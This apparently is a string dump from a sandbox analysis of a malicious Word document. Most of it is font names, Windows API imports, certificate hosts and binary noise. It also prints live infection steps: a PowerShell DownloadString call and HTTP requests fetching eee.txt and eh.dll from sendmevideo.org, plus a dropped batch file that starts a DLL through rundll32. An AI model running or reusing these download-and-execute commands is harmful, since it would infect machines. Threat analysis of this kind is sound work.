PK-!$[Content_Types].xmlPK-!N_rels/.relsPK-!|;9"word/_rels/document.xml.relsPK-!yUBword/document.xmlPK-!/]N word/theme/theme1.xmlPK-!5Iword/settings.xmlPK-!Nword/webSettings.xmlPK-!To^=word/stylesWithEffects.xmlPK-!_DMt!docProps/core.xmlPK-!e:)?m:U$word/styles.xmlPK-!EOM+word/fontTable.xmlPK-!uwv-docProps/app.xmlPKb0

Ansi based on Dropped File (~WRD0000.tmp)

Plantagenet Cherokee

Unicode based on Runtime Data (WINWORD.EXE )

Playbill

Unicode based on Runtime Data (WINWORD.EXE )

PMingLiU

Unicode based on Runtime Data (WINWORD.EXE )

PMingLiU-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Poor Richard

Unicode based on Runtime Data (WINWORD.EXE )

Pristina

Unicode based on Runtime Data (WINWORD.EXE )

Process32First

Ansi based on PCAP Processing (network.pcap)

Process32Next

Ansi based on PCAP Processing (network.pcap)

ProductFiles

Unicode based on Runtime Data (WINWORD.EXE )

ProductName

Unicode based on Dropped File (carved_0.dll.1509628513544)

ProductNonBootFilesIntl_1033

Unicode based on Runtime Data (WINWORD.EXE )

ProxyBypass

Unicode based on Runtime Data (WINWORD.EXE )

ProxyEnable

Unicode based on Runtime Data (rundll32.exe )

ProxyOverride

Unicode based on Runtime Data (rundll32.exe )

ProxyServer

Unicode based on Runtime Data (rundll32.exe )

PSSSSSSVS

Ansi based on PCAP Processing (network.pcap)

q4V[x%

Ansi based on Dropped File (carved_0.dll.1509628513544)

qD8AiIQg4

Ansi based on PCAP Processing (network.pcap)

QueryPerformanceCounter

Ansi based on PCAP Processing (network.pcap)

R`parD"[2nCeun`X?x-^XiF'*1L-]3NiK^"C!FNs=g@\o^^h^^h;l/izfNpA{;$8cg]|s);O:SpJMTcaZEobb*y2"_CZ4JNLz4eQizIaL* 42@-^\MCG-&+[WFWmf$PjMZ-sunX-U=FUMt]7 '#8M#p'[VW8?8PU 6jWfT=v&Pj7NxX

Ansi based on Dropped File (~WRD0000.tmp)

Raavi

Unicode based on Runtime Data (WINWORD.EXE )

Rage Italic

Unicode based on Runtime Data (WINWORD.EXE )

RASMAN

Unicode based on Runtime Data (powershell.exe )

rasman

Ansi based on Runtime Data (powershell.exe )

Ravie

Unicode based on Runtime Data (WINWORD.EXE )

ReadFile

Ansi based on Dropped File (carved_0.dll.1509628513544)

Reference_

Ansi based on Image Processing (screen_3.png)

RegCloseKey

Ansi based on PCAP Processing (network.pcap)

RegCreateKeyExA

Ansi based on PCAP Processing (network.pcap)

RegOpenKeyExA

Ansi based on PCAP Processing (network.pcap)

RegQueryValueExA

Ansi based on PCAP Processing (network.pcap)

RegSetValueExA

Ansi based on PCAP Processing (network.pcap)

Review

Ansi based on Image Processing (screen_3.png)

rFJKR|epcY`

Ansi based on PCAP Processing (network.pcap)

Rifirinci_

Ansi based on Image Processing (screen_6.png)

Rivim

Ansi based on Image Processing (screen_6.png)

Rockwell

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Rockwell Extra Bold

Unicode based on Runtime Data (WINWORD.EXE )

RY3d>"!~D

Ansi based on PCAP Processing (network.pcap)

s "%s", %s

Unicode based on Dropped File (carved_0.dll.1509628513544)

S/$0O:QbgH(AZ[n)B(#1TJ4~%&.U]_oQh;;l]-e!2Y)?yh\e?e,OUxB*sP}br>aM|XKdPK!To^=word/stylesWithEffects.xmlmS8}CHp4P3m60Z|~ pV;wc]Wa<$2Z'}=,GNg}%tx>,=TcO^O2'-NhW,zb[d#`e,=$dceb%\yCj8T(G$(pk!2M$<dnDPkt+0(u=Aa`AwIW0EF9ljaH}Id[wb1MhmeI\jh)@c.7,zH&lG*}RKYd&YFYl,+_/T

Ansi based on Dropped File (~WRD0000.tmp)

s] <"w

Ansi based on Dropped File (~WRD0000.tmp)

s__g,.

Ansi based on Image Processing (screen_6.png)

Sakkal Majalla

Unicode based on Runtime Data (WINWORD.EXE )

satellitedeluxpanorama

Ansi based on PCAP Processing (network.pcap)

satellitedeluxpanorama.com

Ansi based on PCAP Processing (network.pcap)

satellitedeluxpanorama.com0

Ansi based on PCAP Processing (network.pcap)

SavedLegacySettings

Unicode based on Runtime Data (rundll32.exe )

Script MT Bold

Unicode based on Runtime Data (WINWORD.EXE )

secnt.dll

Ansi based on PCAP Processing (network.pcap)

SECU_

Ansi based on Image Processing (screen_0.png)

Security1

Ansi based on PCAP Processing (network.pcap)

Segoe Print

Unicode based on Runtime Data (WINWORD.EXE )

Segoe Script

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Light

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Semibold

Unicode based on Runtime Data (WINWORD.EXE )

Segoe UI Symbol

Unicode based on Runtime Data (WINWORD.EXE )

sendmevideo

Ansi based on PCAP Processing (network.pcap)

sendmevideo.org

Ansi based on PCAP Processing (PCAP)

ServicesActive

Unicode based on Runtime Data (rundll32.exe )

set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"

Ansi based on Dropped File (mvdrt.bat)

set inst_pck = "%ALLUSERSPROFILE%\mvdrt.dll"if NOT exist %inst_pck % (exit)start rundll32.exe %inst_pck %,#1

Ansi based on Dropped File (mvdrt.bat)

SetLastError

Ansi based on PCAP Processing (network.pcap)

SHELL32.dll

Ansi based on PCAP Processing (network.pcap)

SHGetSpecialFolderPathW

Ansi based on PCAP Processing (network.pcap)

Shonar Bangla

Unicode based on Runtime Data (WINWORD.EXE )

Showcard Gothic

Unicode based on Runtime Data (WINWORD.EXE )

Shruti

Unicode based on Runtime Data (WINWORD.EXE )

si_ict

Ansi based on Image Processing (screen_6.png)

Silict_

Ansi based on Image Processing (screen_3.png)

SimHei

Unicode based on Runtime Data (WINWORD.EXE )

Simplified Arabic

Unicode based on Runtime Data (WINWORD.EXE )

Simplified Arabic Fixed

Unicode based on Runtime Data (WINWORD.EXE )

SimSun

Unicode based on Runtime Data (WINWORD.EXE )

SimSun-ExtB

Unicode based on Runtime Data (WINWORD.EXE )

Site 1

Unicode based on Runtime Data (WINWORD.EXE )

Site 10

Unicode based on Runtime Data (WINWORD.EXE )

Site 11

Unicode based on Runtime Data (WINWORD.EXE )

Site 12

Unicode based on Runtime Data (WINWORD.EXE )

Site 13

Unicode based on Runtime Data (WINWORD.EXE )

Site 14

Unicode based on Runtime Data (WINWORD.EXE )

Site 15

Unicode based on Runtime Data (WINWORD.EXE )

Site 16

Unicode based on Runtime Data (WINWORD.EXE )

Site 17

Unicode based on Runtime Data (WINWORD.EXE )

Site 18

Unicode based on Runtime Data (WINWORD.EXE )

Site 19

Unicode based on Runtime Data (WINWORD.EXE )

Site 2

Unicode based on Runtime Data (WINWORD.EXE )

Site 20

Unicode based on Runtime Data (WINWORD.EXE )

Site 3

Unicode based on Runtime Data (WINWORD.EXE )

Site 4

Unicode based on Runtime Data (WINWORD.EXE )

Site 5

Unicode based on Runtime Data (WINWORD.EXE )

Site 6

Unicode based on Runtime Data (WINWORD.EXE )

Site 7

Unicode based on Runtime Data (WINWORD.EXE )

Site 8

Unicode based on Runtime Data (WINWORD.EXE )

Site 9

Unicode based on Runtime Data (WINWORD.EXE )

Sleep

Ansi based on Dropped File (carved_0.dll.1509628513544)

Snap ITC

Unicode based on Runtime Data (WINWORD.EXE )

SNle_

Ansi based on Image Processing (screen_6.png)

source.android.google.cn

Ansi based on PCAP Processing (network.pcap)

SpellingAndGrammarFiles_1033

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_1036

Unicode based on Runtime Data (WINWORD.EXE )

SpellingAndGrammarFiles_3082

Unicode based on Runtime Data (WINWORD.EXE )

StaleIETldCache

Unicode based on Runtime Data (rundll32.exe )

start rundll32.exe %inst_pck %,#1

Ansi based on Dropped File (mvdrt.bat)

Stencil

Unicode based on Runtime Data (WINWORD.EXE )

StringFileInfo

Unicode based on Dropped File (carved_0.dll.1509628513544)

Sylfaen

Unicode based on Runtime Data (WINWORD.EXE )

Symbol

Unicode based on Runtime Data (WINWORD.EXE )

System.Net.WebClient.DownlodString('http://sendmevideo.org/dh2025e/eee.txt');powershell;

Ansi based on Process Commandline (00040140-00002460)

t?f98t:j%YjsZj\f

Ansi based on PCAP Processing (network.pcap)

t___t____

Ansi based on Image Processing (screen_6.png)

Tahoma

Unicode based on Runtime Data (WINWORD.EXE )

TC(9Mj

Ansi based on Dropped File (~WRD0000.tmp)

Tempus Sans ITC

Unicode based on Runtime Data (WINWORD.EXE )

TLDUpdates

Unicode based on Runtime Data (rundll32.exe )

Traditional Arabic

Unicode based on Runtime Data (WINWORD.EXE )

TranslateMessage

Ansi based on PCAP Processing (network.pcap)

Trebuchet MS

Unicode based on Runtime Data (WINWORD.EXE )

Tunga

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT Condensed

Unicode based on Runtime Data (WINWORD.EXE )

Tw Cen MT Condensed Extra Bold

Unicode based on Runtime Data (WINWORD.EXE )

t{-E;X6?vX&+$Hy'r}}W6]1oXWV:DzHp*\;\)4{wt%n0,vFO9cxY:Y7,N%gwY PK!e:)?m:word/styles.xmlS8oiHi^i{gVMm+g+]>~Vw yGOfJ'dP%wOHBD.G<F2@;L`+c;Nca2LbQ+)8bE*W:21~,$]VZXiKu :GX4*Hutf{4?&XE0x-\+d2I

Ansi based on Dropped File (~WRD0000.tmp)

UNCAsIntranet

Unicode based on Runtime Data (WINWORD.EXE )

UnmapViewOfFile

Ansi based on PCAP Processing (network.pcap)

urchin.c(

Ansi based on PCAP Processing (network.pcap)

USER32.dll

Ansi based on PCAP Processing (network.pcap)

Utsaah

Unicode based on Runtime Data (WINWORD.EXE )

uz/l$

Ansi based on Dropped File (~WRD0000.tmp)

v`g/~{_Mc4(i%a)S.Lp)D^i)XKf\m

Ansi based on Dropped File (~WRD0000.tmp)

VarFileInfo

Unicode based on Dropped File (carved_0.dll.1509628513544)

Verdana

Unicode based on Runtime Data (WINWORD.EXE )

VerifyVersionInfoW

Ansi based on PCAP Processing (network.pcap)

VerSetConditionMask

Ansi based on PCAP Processing (network.pcap)

Vijaya

Unicode based on Runtime Data (WINWORD.EXE )

Viner Hand ITC

Unicode based on Runtime Data (WINWORD.EXE )

VirtualAlloc

Ansi based on PCAP Processing (network.pcap)

VirtualFree

Ansi based on PCAP Processing (network.pcap)

Vivaldi

Unicode based on Runtime Data (WINWORD.EXE )

Vladimir Script

Unicode based on Runtime Data (WINWORD.EXE )

vmzQC-J6%s - %lu

Ansi based on PCAP Processing (network.pcap)

Vrinda

Unicode based on Runtime Data (WINWORD.EXE )

VS_VERSION_INFO

Unicode based on Dropped File (carved_0.dll.1509628513544)

w".4kj,g6_WyF!#G2>

Ansi based on Dropped File (~WRD0000.tmp)

w0rdc;

Ansi based on Image Processing (screen_6.png)

W=8}L$mNz7"T-ur_(/IuvX?z~6po+Ua/

Ansi based on Dropped File (~WRD0000.tmp)

WaitForSingleObject

Ansi based on PCAP Processing (network.pcap)

Webdings

Unicode based on Runtime Data (WINWORD.EXE )

Wide Latin

Unicode based on Runtime Data (WINWORD.EXE )

WideCharToMultiByte

Ansi based on PCAP Processing (network.pcap)

Wingdings

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings 2

Unicode based on Runtime Data (WINWORD.EXE )

Wingdings 3

Unicode based on Runtime Data (WINWORD.EXE )

WININET.dll

Ansi based on PCAP Processing (network.pcap)

WORDFiles

Unicode based on Runtime Data (WINWORD.EXE )

WpadDecision

Unicode based on Runtime Data (rundll32.exe )

WpadDecisionReason

Unicode based on Runtime Data (rundll32.exe )

WpadDecisionTime

Unicode based on Runtime Data (rundll32.exe )

WpadLastNetwork

Unicode based on Runtime Data (rundll32.exe )

WpadNetworkName

Unicode based on Runtime Data (rundll32.exe )

WriteFile

Ansi based on PCAP Processing (network.pcap)

WS2_32.dll

Ansi based on PCAP Processing (network.pcap)

wsprintfA

Ansi based on PCAP Processing (network.pcap)

wsprintfW

Ansi based on PCAP Processing (network.pcap)

www.goo.gl

Ansi based on PCAP Processing (network.pcap)

XjiYjl_jaf

Ansi based on PCAP Processing (network.pcap)

xOm~_O

Ansi based on Dropped File (carved_0.dll.1509628513544)

xvGdxeGex>Gdx

Ansi based on PCAP Processing (network.pcap)

y6rC(Wuh5

Ansi based on PCAP Processing (network.pcap)

Y8\bOVRU0

Ansi based on PCAP Processing (network.pcap)

youtube.com

Ansi based on PCAP Processing (network.pcap)

youtubeeducation.com

Ansi based on PCAP Processing (network.pcap)

y}_{8r i{

Ansi based on PCAP Processing (network.pcap)

Z,P6vO[f6C=\f{Ya)7$vj?G(a

Ansi based on Dropped File (~WRD0000.tmp)

zk7^U}p'6XpgE3/,\hv.KDY

Ansi based on Dropped File (~WRD0000.tmp)

zMU=ZNz@*Qba@r"M:y+0Ow2}oIc,XP@&DBAIJqD(

Ansi based on Dropped File (~WRD0000.tmp)

zO-}@t

Ansi based on Dropped File (carved_0.dll.1509628513544)

{09477111-DE61-43CD-A5AA-D9F7B489301F}

Unicode based on Runtime Data (rundll32.exe )

|O-}@~

Ansi based on Dropped File (carved_0.dll.1509628513544)

|p&h@JrRe

Ansi based on PCAP Processing (network.pcap)

|sJXOI|x"Ef.2%>>2S^Xb)?w.E"drtz]"=Z^Xcf8bm$$<R6g./

Ansi based on Dropped File (~WRD0000.tmp)

~%0uJNGr:E/6|,doJkF`

Ansi based on Dropped File (~WRD0000.tmp)

~C(g{.hHq

Ansi based on PCAP Processing (network.pcap)

~xM`ijU <8PU 6o#\vMST';@5:k&017qq.bkx@lypx@lmla(y{%]

Ansi based on Dropped File (~WRD0000.tmp)

~xM`ijU <8PU 6o\vMSTs;@5oex@KA##8M

Ansi based on Dropped File (~WRD0000.tmp)

~xM`ijU <8PU |

Ansi based on Dropped File (~WRD0000.tmp)

$5caa`= &!Cd,E.y6CnHgs0_?V_Nw ,{5Iq{Bl(p_cdS|&PO\UbHcK)KjVkUSD2P

Ansi based on Dropped File (~WRD0000.tmp)

$http://g.symcb.com/crls/gtglobal.crl0!

Ansi based on PCAP Processing (network.pcap)

%?nu gPK!/]N word/theme/theme1.xmlY;4.[?%y

Ansi based on Dropped File (~WRD0000.tmp)

%PROGRAMFILES%\Microsoft Office\Office14\wwlib.dll

Unicode based on Runtime Data (WINWORD.EXE )

)http://crl.geotrust.com/crls/secureca.crl0N

Ansi based on PCAP Processing (network.pcap)

*.android.com

Ansi based on PCAP Processing (network.pcap)

*.appengine.google.com

Ansi based on PCAP Processing (network.pcap)

*.cloud.google.com

Ansi based on PCAP Processing (network.pcap)

*.db833953.google.cn

Ansi based on PCAP Processing (network.pcap)

*.gcp.gvt2.com

Ansi based on PCAP Processing (network.pcap)

*.google-analytics.com

Ansi based on PCAP Processing (network.pcap)

*.google.ca

Ansi based on PCAP Processing (network.pcap)

*.google.cl

Ansi based on PCAP Processing (network.pcap)

*.google.co.in

Ansi based on PCAP Processing (network.pcap)

*.google.co.jp

Ansi based on PCAP Processing (network.pcap)

*.google.co.uk

Ansi based on PCAP Processing (network.pcap)

*.google.com

Ansi based on PCAP Processing (network.pcap)

*.google.com.ar

Ansi based on PCAP Processing (network.pcap)

*.google.com.au

Ansi based on PCAP Processing (network.pcap)

*.google.com.br

Ansi based on PCAP Processing (network.pcap)

*.google.com.co

Ansi based on PCAP Processing (network.pcap)

*.google.com.mx

Ansi based on PCAP Processing (network.pcap)

*.google.com.tr

Ansi based on PCAP Processing (network.pcap)

*.google.com.vn

Ansi based on PCAP Processing (network.pcap)

*.google.com0Y0

Ansi based on PCAP Processing (network.pcap)

*.google.de

Ansi based on PCAP Processing (network.pcap)

*.google.es

Ansi based on PCAP Processing (network.pcap)

*.google.fr

Ansi based on PCAP Processing (network.pcap)

*.google.hu

Ansi based on PCAP Processing (network.pcap)

*.google.it

Ansi based on PCAP Processing (network.pcap)

*.google.nl

Ansi based on PCAP Processing (network.pcap)

*.google.pl

Ansi based on PCAP Processing (network.pcap)

*.google.pt

Ansi based on PCAP Processing (network.pcap)

*.googleadapis.com

Ansi based on PCAP Processing (network.pcap)

*.googleapis.cn

Ansi based on PCAP Processing (network.pcap)

*.googlecommerce.com

Ansi based on PCAP Processing (network.pcap)

*.googlevideo.com

Ansi based on PCAP Processing (network.pcap)

*.gstatic.cn

Ansi based on PCAP Processing (network.pcap)

*.gstatic.com

Ansi based on PCAP Processing (network.pcap)

*.gvt1.com

Ansi based on PCAP Processing (network.pcap)

*.gvt2.com

Ansi based on PCAP Processing (network.pcap)

*.metric.gstatic.com

Ansi based on PCAP Processing (network.pcap)

*.urchin.com

Ansi based on PCAP Processing (network.pcap)

*.url.google.com

Ansi based on PCAP Processing (network.pcap)

*.youtube-nocookie.com

Ansi based on PCAP Processing (network.pcap)

*.youtube.com

Ansi based on PCAP Processing (network.pcap)

*.youtubeeducation.com

Ansi based on PCAP Processing (network.pcap)

*.ytimg.com

Ansi based on PCAP Processing (network.pcap)

-'--'-

Ansi based on Image Processing (screen_3.png)

Ansi based on Process Commandline (powershell.exe)

-https://www.geotrust.com/resources/repository0

Ansi based on PCAP Processing (network.pcap)

.MfIZUq"=loO.Y$m.+gAT!,MQH(XI\qZbaG;_K

Ansi based on Dropped File (~WRD0000.tmp)

.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!=lgtdocProps/core.xml (RN0}7YH$o@e0{V{6}WeTTz=%y|G"5LW0-<

Ansi based on Dropped File (~WRD0002.tmp)

.{] }'.z`u^m*D=6FT8n upxJFfq:~2:wNwOw_1Ym:K}BVbD>D-ngdx|gBZ&WkV2d>>'@9T1Uu'qTCD{]kK)`gz[[PK!_DMtdocProps/core.xml (RN0}7Y`$jxD^uM[w+fL|sO;"uS@J*<'\K^T0,

Ansi based on Dropped File (~WRD0000.tmp)

/n "C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx"

Ansi based on Process Commandline (WINWORD.EXE)

/x#,/d}?eh7)mg;kk4Df2/wBmw4A^#FkPHxAt~9'ozWnMtVWkJlNWz^>\PK!yUword/document.xmlVKo8/@=X'udshj)rPXF$mwuqa>fIp_lJT *_o.+T0

Ansi based on Dropped File (~WRD0000.tmp)

0/EEa}@+Du7Lcc@M+.!}!$ OuRIdHA(1x$u#Qx2R*XLOP[nDY3+L!H?%kE

Ansi based on Dropped File (~WRD0000.tmp)

1`2"7BAoGm)TrJ(A^%>f+hOO3`=VEs9kA"(-$gkm,w"F,#SC`n[J(%

Ansi based on Dropped File (~WRD0000.tmp)

5(FSrgC4YTrsB,i1j!u'66@AP\?F.sNlt<>=9^Q*pOC4Jew"i3!zCIa~.4K+}ip{:Z|cIy]?pkXN2

Ansi based on Dropped File (~WRD0000.tmp)

6iD_,|uZ^ty;!Y,}{C/h>PK!|;9"word/_rels/document.xml.rels (MO0&V]5-Sht

Ansi based on Dropped File (~WRD0000.tmp)

7PXd}Wt]tsso*UM\x@wAm`8TQkPp<Nw.4875TZ(ZG[iF?h;gy)vPK!5Iword/settings.xmlVn8}/`yIoSmQ@IM7;$(ihOg~+M_FE

Ansi based on Dropped File (~WRD0000.tmp)

9AMFPoJ5x#@07_9W%M7"q."kx#@dyx#@dmPl(xS

Ansi based on Dropped File (~WRD0000.tmp)

<h1>Not Found</h1>The requested URL // was not found on this server.

Ansi based on Dropped File (VRzZ5.vnd[1].txt)

='I ZRPGQh6\lFXt778Co5(h5({pm[{v?~

Ansi based on Dropped File (~WRD0000.tmp)

=1d){%}wofjQr??.z/L?1Z?o)IK9Ka:6|'1M1%Y,P,#X'kD7_rH&.+$+I'<ewZ0t=G5w2(ql|FQ&Q3,=cXWXv=%3[H+

Ansi based on Dropped File (~WRD0000.tmp)

=I]B,lD@=VSk(]&(f2:tSiX30IQbU`MZ9UBrFL+b2cyP.

Ansi based on Dropped File (~WRD0000.tmp)

>FY!OGPRW<s@4S:>Y;^UW+Kn|6SD3EG-XVNinjkR}v!{GNGVlenomUCIw]]w-]rU|!zvzm{:BkMzfA(5'BbaPSK\-L`b$AK8JI,

Ansi based on Dropped File (~WRD0000.tmp)

>iWb[gDhzJBewmW&, fcmA@F[&G/3bj<ML@F[Kjb>g??ky.,z22pBWA=+3SA:*P.v5~ol8S-wt`LET

Ansi based on Dropped File (~WRD0000.tmp)

?_O-~\Tn`z&{(

Ansi based on PCAP Processing (network.pcap)

@%z:pov<t..P/LmTLz5qdFhMFhDFh$wD##1-\*:Zw"O(t]F=$,8epj9=\,Y"vgF;{&

Ansi based on Dropped File (~WRD0000.tmp)

@Batang

Unicode based on Runtime Data (WINWORD.EXE )

@BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D19C127D907AA0][O00000000]*%USERPROFILE%\Desktop\New Microsoft Word Document.docx

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D353DC2DAD29B0][O00000000]*C:\

Unicode based on Runtime Data (WINWORD.EXE )

[F00000000][T01D353DC2DB036F0][O00000000]*C:\759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6.docx

Unicode based on Runtime Data (WINWORD.EXE )

Ansi based on Process Commandline (00040970-00001420)

Ansi based on Dropped File (~WRD0002.tmp)

\JeL{QJ*[r]SI2%x.MHNRtfgV@

Ansi based on Dropped File (~WRD0000.tmp)

]3j%L]CBr#7@>KVkZ^-d ukW.+"p!

Ansi based on Dropped File (~WRD0000.tmp)

^@5)mDYq/bfdMRMVs*Bc.cl%(r]3,R~<!

Ansi based on Dropped File (~WRD0000.tmp)

^aQFldee2nVA=t8`7M:liA%JE\F/ }D\.zrSu1FxlEmZUAs7g?d.1?{:.|hc

Ansi based on Dropped File (~WRD0000.tmp)

_::_::_

Ansi based on Image Processing (screen_3.png)

_;-_'_-_'',_'t-_-,t-_-,

Ansi based on Image Processing (screen_3.png)

`\??\Volume{8177f4e4-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

`\??\Volume{8177f4e5-b53f-11e4-a9c2-806e6f6e6963}

Unicode based on Runtime Data (WINWORD.EXE )

android.clients.google.com

Ansi based on PCAP Processing (network.pcap)

android.com

Ansi based on PCAP Processing (network.pcap)

Batang

Unicode based on Runtime Data (WINWORD.EXE )

BatangChe

Unicode based on Runtime Data (WINWORD.EXE )

Bodoni MT Poster Compressed

Unicode based on Runtime Data (WINWORD.EXE )

Brush Script MT

Unicode based on Runtime Data (WINWORD.EXE )

bTc+28aBU64."=*+;?GNHA7K<]P;~T<x4:=GqJ.,NdTQ}<G37p,Mda03IIt$nXrgG$iXYPI%I?c5.RWlpBb5T!u7+U Kghj~5(QV

Ansi based on Dropped File (~WRD0000.tmp)

Ansi based on Process Commandline (powershell.exe)

Ansi based on Dropped File (~WRD0000.tmp)

Comic Sans MS

Unicode based on Runtime Data (WINWORD.EXE )

CompanyName

Unicode based on Dropped File (carved_0.dll.1509628513544)

CreateMutexA

Ansi based on PCAP Processing (network.pcap)

CreateRemoteThread

Ansi based on PCAP Processing (network.pcap)

CryptBinaryToStringA

Ansi based on PCAP Processing (network.pcap)

CryptStringToBinaryA

Ansi based on PCAP Processing (network.pcap)

d%HT`r-S8d%w=d[Zh-BFU4n~]:_z0vRwq!<dqGvvrk

Ansi based on Dropped File (~WRD0000.tmp)

DefaultConnectionSettings

Unicode based on Runtime Data (rundll32.exe )

developer.android.google.cn

Ansi based on PCAP Processing (network.pcap)

developers.android.google.cn

Ansi based on PCAP Processing (network.pcap)

DZf|V.SR'H&.5SXS5tH.KbDytNH/9(12{g%?

Ansi based on Dropped File (~WRD0000.tmp)

Edwardian Script ITC

Unicode based on Runtime Data (WINWORD.EXE )

FileDescription

Unicode based on Dropped File (carved_0.dll.1509628513544)

FileVersion

Unicode based on Dropped File (carved_0.dll.1509628513544)

Freestyle Script

Unicode based on Runtime Data (WINWORD.EXE )

French Script MT

Unicode based on Runtime Data (WINWORD.EXE )

Ft#6"w9:0t[E[?N1~piMPir1/C4^C,_R&+Hd\CBwPV*h"|x0gV5iy$4V"e9BA)jT(y>vwv(SLqWUDXQw4S^0F"\gsldYdLuHc9>(hVD5{A7tPK!N_rels/.rels (JAa}7

Ansi based on Dropped File (~WRD0000.tmp)

g$mg49z'c'Yy&h-]IB[nxG!!i[1dsjT"5U$Z,K_M-sdC""h`#BE=x56f}P^Hjl9*T`<Oy`#@P~x2d$6dy%t@`'ut|+{{W>d7\iIv

Ansi based on Dropped File (~WRD0000.tmp)

G_)Ew_9_8]ROu!}=I]?re

Ansi based on Dropped File (~WRD0000.tmp)

GdipGetImageEncoders

Ansi based on PCAP Processing (network.pcap)

GdipGetImageEncodersSize

Ansi based on PCAP Processing (network.pcap)

GdipSaveImageToStream

Ansi based on PCAP Processing (network.pcap)

GET /dh2025e/eee.txt HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive

Ansi based on PCAP Processing (network.pcap)

GET /dh2025e/eh.dll HTTP/1.1Host: sendmevideo.orgConnection: Keep-Alive!

Ansi based on PCAP Processing (network.pcap)

GetAdaptersAddresses

Ansi based on PCAP Processing (network.pcap)

GetCurrentProcess

Ansi based on PCAP Processing (network.pcap)

GetExitCodeP!

Ansi based on PCAP Processing (network.pcap)

GetExitCodeProcess

Ansi based on Dropped File (carved_0.dll.1509628513544)

GetExitCodeThread

Ansi based on PCAP Processing (network.pcap)

GetFileSize

Ansi based on PCAP Processing (network.pcap)

GetLastError

Ansi based on PCAP Processing (network.pcap)

GetMessageA

Ansi based on PCAP Processing (network.pcap)

GetModuleHandleA

Ansi based on PCAP Processing (network.pcap)

GetPrivateProfileStringW

Ansi based on PCAP Processing (network.pcap)

GetProcAddress

Ansi based on PCAP Processing (network.pcap)

GetProcessHeap

Ansi based on PCAP Processing (network.pcap)

GetSystemInfo

Ansi based on PCAP Processing (network.pcap)

GetSystemMetrics

Ansi based on PCAP Processing (network.pcap)

GetSystemTimeAsFileTime

Ansi based on PCAP Processing (network.pcap)

GetTickCount

Ansi based on PCAP Processing (network.pcap)

GetVersionExA

Ansi based on PCAP Processing (network.pcap)

GetVolumeInformationW

Ansi based on PCAP Processing (network.pcap)

google-analytics.com

Ansi based on PCAP Processing (network.pcap)

google.com

Ansi based on PCAP Processing (network.pcap)

googlecommerce.com

Ansi based on PCAP Processing (network.pcap)

h8:Bw^y5,X1Nh0`}y[eym/JDr8M)K-2}u>>uSj:7"Ff9b]sXvT)@6zKjRz}O\

Ansi based on Dropped File (~WRD0000.tmp)

h['!#EeF+Y-FWmfDPjMZ/}o"X-]=GUMEUoDD74x#@74\!7EUF+?XPU 6+fT=m#7BNPSrvP*R`#8#8#p'YV"UPaxUA!')

Ansi based on Dropped File (~WRD0000.tmp)

Ansi based on PCAP Processing (network.pcap)

http://clients1.google.com/ocsp0

Ansi based on PCAP Processing (network.pcap)

http://g.symcd.com0

Ansi based on PCAP Processing (network.pcap)

http://pki.google.com/GIAG2.crl0

Ansi based on PCAP Processing (network.pcap)

http://pki.google.com/GIAG2.crt0+

Ansi based on PCAP Processing (network.pcap)

HttpOpenRequestA

Ansi based on PCAP Processing (network.pcap)

HttpQueryInfoA

Ansi based on PCAP Processing (network.pcap)

HttpSendRequestA

Ansi based on PCAP Processing (network.pcap)

i../*,5zXz+ /0,TE^tw7fYEsKwH:EaO||ewV)QKQHzpd#p]y"j^}>)0d^Vwuo?fa>[U`(U}}I+

Ansi based on Dropped File (~WRD0000.tmp)

IETldDllVersionHigh

Unicode based on Runtime Data (rundll32.exe )

IETldDllVersionLow

Unicode based on Runtime Data (rundll32.exe )

IETldVersionHigh

Unicode based on Runtime Data (rundll32.exe )

IETldVersionLow

Unicode based on Runtime Data (rundll32.exe )

if NOT exist %inst_pck % (exit)

Ansi based on Dropped File (mvdrt.bat)

Informal Roman

Unicode based on Runtime Data (WINWORD.EXE )

IrisUPC

Unicode based on Runtime Data (WINWORD.EXE )

IsWow64Process

Ansi based on PCAP Processing (network.pcap)

J(6-!FnBPFb2y(R1"I2OxfT#L

Ansi based on Dropped File (~WRD0000.tmp)

j.dR?(QxP3'J5$4v~^W=)~-}"!E?~BT5+

Ansi based on Dropped File (~WRD0000.tmp)

j.k#g,yw}*B.KO*/bUg+LO}/,zp 3j@@8*thox9cxpaA3j.p'M18nt}ynTT<91E#z[4E#Gz[4RE#z[4pv

Ansi based on Dropped File (~WRD0000.tmp)

Jv_uPK!Nword/webSettings.xmlJ1;,"t R"ivvdLjOo ^z$@_f^

Ansi based on Dropped File (~WRD0000.tmp)

Kunstler Script

Unicode based on Runtime Data (WINWORD.EXE )

l_____:,_---_---_

Ansi based on Image Processing (screen_3.png)

LastPurgeTime

Unicode based on Runtime Data (WINWORD.EXE )

LUl\$^U@UO^"9Ac |K`z'r{Wi/}.'26&g\U&|qJvVPK!uwvdocProps/app.xml (RN0#QPPKj

Ansi based on Dropped File (~WRD0000.tmp)

LvVxJO<?d^YZXaTtC@^1M *#Y0^:XtX+Ix!8q{z]!cZPS"*V<m0&-<nj*4=evc,nk

Ansi based on Dropped File (~WRD0000.tmp)

Matura MT Script Capitals

Unicode based on Runtime Data (WINWORD.EXE )

mspim_wnd32

Unicode based on Runtime Data (WINWORD.EXE )

O,CtU$Wq:h2]$}|z%jo4>6]>b>M8M2_f}u=fJ7lkO

Ansi based on Dropped File (~WRD0000.tmp)

oductVersion

